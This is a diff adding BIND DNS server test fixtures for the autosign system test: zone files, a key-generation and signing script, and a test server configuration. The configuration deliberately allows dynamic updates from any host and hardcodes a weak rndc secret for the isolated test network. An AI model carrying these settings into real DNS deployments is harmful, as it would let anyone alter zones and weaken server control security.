MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/inacksk3.example.db.in b/bin/tests/system/autosign/ns3/inacksk3.example.db.in new file mode 100644 index 0000000..1376922 --- /dev/null +++ b/bin/tests/system/autosign/ns3/inacksk3.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/inaczsk.example.db.in b/bin/tests/system/autosign/ns3/inaczsk.example.db.in new file mode 100644 index 0000000..1376922 --- /dev/null +++ b/bin/tests/system/autosign/ns3/inaczsk.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/inaczsk2.example.db.in b/bin/tests/system/autosign/ns3/inaczsk2.example.db.in new file mode 100644 index 0000000..1376922 --- /dev/null +++ b/bin/tests/system/autosign/ns3/inaczsk2.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/inaczsk3.example.db.in b/bin/tests/system/autosign/ns3/inaczsk3.example.db.in new file mode 100644 index 0000000..1376922 --- /dev/null +++ b/bin/tests/system/autosign/ns3/inaczsk3.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +x CNAME a diff --git a/bin/tests/system/autosign/ns3/insecure.example.db b/bin/tests/system/autosign/ns3/insecure.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/autosign/ns3/insecure.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/autosign/ns3/jitter.nsec3.example.db.in b/bin/tests/system/autosign/ns3/jitter.nsec3.example.db.in new file mode 100644 index 0000000..8a96023 --- /dev/null +++ b/bin/tests/system/autosign/ns3/jitter.nsec3.example.db.in @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + diff --git a/bin/tests/system/autosign/ns3/keygen.sh b/bin/tests/system/autosign/ns3/keygen.sh new file mode 100644 index 0000000..53547d3 --- /dev/null +++ b/bin/tests/system/autosign/ns3/keygen.sh @@ -0,0 +1,399 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +SYSTESTDIR=autosign + +dumpit () { + echo_d "${debug}: dumping ${1}" + cat "${1}" | cat_d +} + +setup () { + echo_i "setting up zone: $1" + debug="$1" + zone="$1" + zonefile="${zone}.db" + infile="${zonefile}.in" + n=$((${n:-0} + 1)) +} + +setup secure.example +cp $infile $zonefile +ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# NSEC3/NSEC test zone +# +setup secure.nsec3.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# NSEC3/NSEC3 test zone +# +setup nsec3.nsec3.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# Jitter/NSEC3 test zone +# +setup jitter.nsec3.example +cp $infile $zonefile +count=1 +while [ $count -le 1000 ] +do + echo "label${count} IN TXT label${count}" >> $zonefile + count=$((count + 1)) +done +# Don't create keys just yet, because the scenario we want to test +# is an unsigned zone that has a NSEC3PARAM record added with +# dynamic update before the keys are generated. + +# +# OPTOUT/NSEC3 test zone +# +setup optout.nsec3.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# A nsec3 zone (non-optout). +# +setup nsec3.example +cat $infile dsset-*.${zone}$TP > $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# An NSEC3 zone, with NSEC3 parameters set prior to signing +# +setup autonsec3.example +cat $infile > $zonefile +ksk=$($KEYGEN -G -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +echo $ksk > ../autoksk.key +zsk=$($KEYGEN -G -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out +echo $zsk > ../autozsk.key +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# OPTOUT/NSEC test zone +# +setup secure.optout.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# OPTOUT/NSEC3 test zone +# +setup nsec3.optout.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# OPTOUT/OPTOUT test zone +# +setup optout.optout.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# A optout nsec3 zone. +# +setup optout.example +cat $infile dsset-*.${zone}$TP > $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# A RSASHA256 zone. +# +setup rsasha256.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a RSASHA256 -b 2048 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a RSASHA256 -b 2048 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# A RSASHA512 zone. +# +setup rsasha512.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a RSASHA512 -b 2048 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a RSASHA512 -b 2048 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# NSEC-only zone. A zone using NSEC-only DNSSEC algorithms. +# None of these algorithms are supported for signing in FIPS mode +# as they are MD5 and SHA1 based. +# +if (cd ..; SYSTEMTESTTOP=.. $SHELL ../testcrypto.sh -q RSASHA1) +then + setup nsec-only.example + cp $infile $zonefile + ksk=$($KEYGEN -q -a RSASHA1 -fk $zone 2> kg.out) || dumpit kg.out + $KEYGEN -q -a RSASHA1 $zone > kg.out 2>&1 || dumpit kg.out + $DSFROMKEY $ksk.key > dsset-${zone}$TP +else + echo_i "skip: nsec-only.example - signing with RSASHA1 not supported" +fi + +# +# Signature refresh test zone. Signatures are set to expire long +# in the past; they should be updated by autosign. +# +setup oldsigs.example +cp $infile $zonefile +count=1 +while [ $count -le 1000 ] +do + echo "label${count} IN TXT label${count}" >> $zonefile + count=$((count + 1)) +done +$KEYGEN -q -a $DEFAULT_ALGORITHM -fk $zone > kg.out 2>&1 || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM $zone > kg.out 2>&1 || dumpit kg.out +$SIGNER -PS -s now-1y -e now-6mo -o $zone -f $zonefile.signed $zonefile > s.out || dumpit s.out +mv $zonefile.signed $zonefile + +# +# NSEC3->NSEC transition test zone. +# +setup nsec3-to-nsec.example +$KEYGEN -q -a $DEFAULT_ALGORITHM -fk $zone > kg.out 2>&1 || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM $zone > kg.out 2>&1 || dumpit kg.out +$SIGNER -S -3 beef -A -o $zone -f $zonefile $infile > s.out || dumpit s.out + +# +# secure-to-insecure transition test zone; used to test removal of +# keys via nsupdate +# +setup secure-to-insecure.example +$KEYGEN -a $DEFAULT_ALGORITHM -q -fk $zone > kg.out 2>&1 || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -q $zone > kg.out 2>&1 || dumpit kg.out +$SIGNER -S -o $zone -f $zonefile $infile > s.out || dumpit s.out + +# +# another secure-to-insecure transition test zone; used to test +# removal of keys on schedule. +# +setup secure-to-insecure2.example +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +echo $ksk > ../del1.key +zsk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out +echo $zsk > ../del2.key +$SIGNER -S -3 beef -o $zone -f $zonefile $infile > s.out || dumpit s.out + +# +# Introducing a pre-published key test. +# +setup prepub.example +infile="secure-to-insecure2.example.db.in" +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone > kg.out 2>&1 || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out +$SIGNER -S -3 beef -o $zone -f $zonefile $infile > s.out || dumpit s.out + +# +# Key TTL tests. +# + +# no default key TTL; DNSKEY should get SOA TTL +setup ttl1.example +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone > kg.out 2>&1 || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out +cp $infile $zonefile + +# default key TTL should be used +setup ttl2.example +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk -L 60 $zone > kg.out 2>&1 || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -L 60 $zone > kg.out 2>&1 || dumpit kg.out +cp $infile $zonefile + +# mismatched key TTLs, should use shortest +setup ttl3.example +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk -L 30 $zone > kg.out 2>&1 || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -L 60 $zone > kg.out 2>&1 || dumpit kg.out +cp $infile $zonefile + +# existing DNSKEY RRset, should retain TTL +setup ttl4.example +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -L 30 -fk $zone > kg.out 2>&1 || dumpit kg.out +cat ${infile} K${zone}.+*.key > $zonefile +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -L 180 $zone > kg.out 2>&1 || dumpit kg.out + +# +# A zone with a DNSKEY RRset that is published before it's activated +# +setup delay.example +ksk=$($KEYGEN -G -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +echo $ksk > ../delayksk.key +zsk=$($KEYGEN -G -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out +echo $zsk > ../delayzsk.key + +# +# A zone with signatures that are already expired, and the private KSK +# is missing. +# +setup noksk.example +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +zsk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out +$SIGNER -S -P -s now-1mo -e now-1mi -o $zone -f $zonefile ${zonefile}.in > s.out || dumpit s.out +echo $ksk > ../noksk-ksk.key +rm -f ${ksk}.private + +# +# A zone with signatures that are already expired, and the private ZSK +# is missing. +# +setup nozsk.example +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +zsk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out +$SIGNER -S -P -s now-1mo -e now-1mi -o $zone -f $zonefile ${zonefile}.in > s.out || dumpit s.out +echo $ksk > ../nozsk-ksk.key +echo $zsk > ../nozsk-zsk.key +rm -f ${zsk}.private + +# +# A zone with signatures that are already expired, and the private ZSK +# is inactive. +# +setup inaczsk.example +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +zsk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out +$SIGNER -S -P -s now-1mo -e now-1mi -o $zone -f $zonefile ${zonefile}.in > s.out || dumpit s.out +echo $ksk > ../inaczsk-ksk.key +echo $zsk > ../inaczsk-zsk.key +$SETTIME -I now $zsk > st.out 2>&1 || dumpit st.out + +# +# A zone that is set to 'auto-dnssec maintain' during a reconfig +# +setup reconf.example +cp secure.example.db.in $zonefile +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone > kg.out 2>&1 || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out + +# +# A zone which generates CDS and CDNSEY RRsets automatically +# +setup sync.example +cp $infile $zonefile +ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk -P sync now $zone 2> kg.out) || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP +echo ns3/$ksk > ../sync.key + +# +# A zone that generates CDS and CDNSKEY and uses dnssec-dnskey-kskonly +# +setup kskonly.example +cp $infile $zonefile +ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk -P sync now $zone 2> kg.out) || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# A zone that has a published inactive key that is autosigned. +# +setup inacksk2.example +cp $infile $zonefile +ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -Pnow -A now+3600 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# A zone that has a published inactive key that is autosigned. +# +setup inaczsk2.example +cp $infile $zonefile +ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -P now -A now+3600 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# A zone that starts with a active KSK + ZSK and a inactive ZSK. +# +setup inacksk3.example +cp $infile $zonefile +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -P now -A now+3600 -fk $zone > kg.out 2>&1 || dumpit kg.out +ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# A zone that starts with a active KSK + ZSK and a inactive ZSK. +# +setup inaczsk3.example +cp $infile $zonefile +ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -P now -A now+3600 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# A zone that starts with an active KSK + ZSK and an inactive ZSK, with the +# latter getting deleted during the test. +# +setup delzsk.example +cp $infile $zonefile +ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out +zsk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -I now-1w $zone 2>kg.out) || dumpit kg.out +echo $zsk > ../delzsk.key + +# +# Check that NSEC3 are correctly signed and returned from below a DNAME +# +setup dname-at-apex-nsec3.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# Check that dynamically added CDS (DELETE) is kept in the zone after signing. +# +setup cds-delete.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP + +# +# Check that dynamically added CDNSKEY (DELETE) is kept in the zone after +# signing. +# +setup cdnskey-delete.example +cp $infile $zonefile +ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out +$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out +$DSFROMKEY $ksk.key > dsset-${zone}$TP diff --git a/bin/tests/system/autosign/ns3/kskonly.example.db.in b/bin/tests/system/autosign/ns3/kskonly.example.db.in new file mode 100644 index 0000000..c6c7f88 --- /dev/null +++ b/bin/tests/system/autosign/ns3/kskonly.example.db.in @@ -0,0 +1,34 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 diff --git a/bin/tests/system/autosign/ns3/named.conf.in b/bin/tests/system/autosign/ns3/named.conf.in new file mode 100644 index 0000000..a1f1f0d --- /dev/null +++ b/bin/tests/system/autosign/ns3/named.conf.in @@ -0,0 +1,334 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; + dnssec-loadkeys-interval 10; + allow-new-zones yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type secondary; + primaries { 10.53.0.2; }; + file "example.bk"; +}; + +zone "bar" { + type secondary; + primaries { 10.53.0.2; }; + file "bar.bk"; +}; + +zone "secure.example" { + type primary; + file "secure.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "insecure.example" { + type primary; + file "insecure.example.db"; +}; + +zone "nsec3.example" { + type primary; + file "nsec3.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "autonsec3.example" { + type primary; + file "autonsec3.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "optout.nsec3.example" { + type primary; + file "optout.nsec3.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "nsec3.nsec3.example" { + type primary; + file "nsec3.nsec3.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "jitter.nsec3.example" { + type primary; + file "jitter.nsec3.example.db"; + allow-update { any; }; + auto-dnssec maintain; + sig-validity-interval 10 2; + sig-signing-nodes 1000; + sig-signing-signatures 100; +}; + +zone "secure.nsec3.example" { + type primary; + file "secure.nsec3.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "optout.example" { + type primary; + file "optout.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "secure.optout.example" { + type primary; + file "secure.optout.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "nsec3.optout.example" { + type primary; + file "nsec3.optout.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "optout.optout.example" { + type primary; + file "optout.optout.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "rsasha256.example" { + type primary; + file "rsasha256.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "rsasha512.example" { + type primary; + file "rsasha512.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "nsec-only.example" { + type primary; + file "nsec-only.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "nsec3-to-nsec.example" { + type primary; + file "nsec3-to-nsec.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "secure-to-insecure.example" { + type primary; + file "secure-to-insecure.example.db"; + allow-update { any; }; + dnssec-secure-to-insecure yes; +}; + +zone "secure-to-insecure2.example" { + type primary; + file "secure-to-insecure2.example.db"; + allow-update { any; }; + auto-dnssec maintain; + dnssec-secure-to-insecure yes; +}; + +zone "oldsigs.example" { + type primary; + file "oldsigs.example.db"; + allow-update { any; }; + auto-dnssec maintain; + sig-validity-interval 10 2; + sig-signing-nodes 1000; + sig-signing-signatures 100; +}; + +zone "prepub.example" { + type primary; + file "prepub.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "ttl1.example" { + type primary; + file "ttl1.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "ttl2.example" { + type primary; + file "ttl2.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "ttl3.example" { + type primary; + file "ttl3.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "ttl4.example" { + type primary; + file "ttl4.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "delay.example" { + type primary; + file "delay.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "nozsk.example" { + type primary; + file "nozsk.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "inaczsk.example" { + type primary; + file "inaczsk.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "noksk.example" { + type primary; + file "noksk.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "sync.example" { + type primary; + file "sync.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "kskonly.example" { + type primary; + file "kskonly.example.db"; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + auto-dnssec maintain; +}; + +zone "inacksk2.example" { + type primary; + file "inacksk2.example.db"; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + auto-dnssec maintain; +}; + +zone "inacksk3.example" { + type primary; + file "inacksk3.example.db"; + allow-update { any; }; + dnssec-dnskey-kskonly yes; + auto-dnssec maintain; +}; + +zone "inaczsk2.example" { + type primary; + file "inaczsk2.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "inaczsk3.example" { + type primary; + file "inaczsk3.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "delzsk.example." { + type primary; + file "delzsk.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "dname-at-apex-nsec3.example" { + type primary; + file "dname-at-apex-nsec3.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "cds-delete.example" { + type primary; + file "cds-delete.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +zone "cdnskey-delete.example" { + type primary; + file "cdnskey-delete.example.db"; + allow-update { any; }; + auto-dnssec maintain; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/autosign/ns3/noksk.example.db.in 